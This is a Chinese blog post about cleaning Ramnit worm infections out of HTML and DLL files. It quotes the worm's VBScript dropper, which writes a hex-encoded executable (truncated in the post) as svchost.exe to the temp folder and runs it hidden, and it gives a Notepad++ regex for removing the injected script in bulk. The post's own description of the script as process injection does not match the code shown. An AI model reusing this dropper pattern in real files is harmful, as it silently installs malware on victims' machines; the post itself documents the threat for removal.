本文最后更新于2022年5月30日,已超过 1 年没有更新,如果文章内容失效,请 反馈 给我们,谢谢!
Ramnit 蠕虫很恶心的一个病毒一串VB脚本的JS ,中了改病毒后你会发现你的本地所有html文档打开后都会有这样一串字符,不仅仅是html文档,连dll文档也会被感染。
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFF
此处省略N个字符
616746696E697368000057696E48656C705700000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
意思就是找到svchost.exe这个进程然后注入数据运行,注入的就是后面的进制代码来运行。这种vbs病毒感染能力非常强,html文件一旦被感染,那么用户只要打开html文档病毒就运行上面改代码导致病毒直接感染到本地电脑全部html文件和dll文件,是全部哦!DLL文件也会呗感染 部分软件可以正常使用 不过杀毒软件会报毒 而且你会发现你运行很多常用软件都会报毒,比如以前常用的迅雷丶酷狗等等一些常用的软件你再打开的时候居然提示都有病毒。
这种病毒简直是丧心病狂损人不利已他就是在你文件最下面加了一大串垃圾代码,如果这个文件被打开了那么所有的文件都加上了这串代码,那体积是相当的大。
上图可以看到单单一个文件查杀前大小为116K查杀后仅为8K将近是原文件的15倍,如果是全站生成静态的那数据量可想而知。
因为我的硬盘里html文件太多了用360杀毒扫描出来几百万个用时一天一夜,当在查杀的时候C盘空间随着查杀时间的增长在快速慢小最终导致C盘空白不足中止,用360之前也用过其它软件要么就是彻底把html文件删除掉了要么就是不能指定目录给我全盘查杀那样太浪费时间了,360的好用是在查杀的同时不会删除和破坏原有的html只是把病毒代码清除原文件完好的保存下来,可是对我这么多文件的情况下不适用最终放弃了。
最后利用Note++批量删除吧,打开它按Ctrl+F点击文件查找,在查找目标中输入正则:
<SCRIPT Language=VBScript><!--(.*)//--></SCRIPT>
替换为里留空,目录选择我们需要查杀的目录。查找模式改为正则如图:
最后点击在文章替换,耐心等待即可,等全部查杀完以后最好再全部查找一下“svchost.exe”看是否有漏网之鱼。
清理前后硬盘空间对比图,整整小了100多个G
版权所有丨如未注明 , 均为原创丨本网站采用 BY-NC-SA 协议进行授权 , 转载请注明 出处!
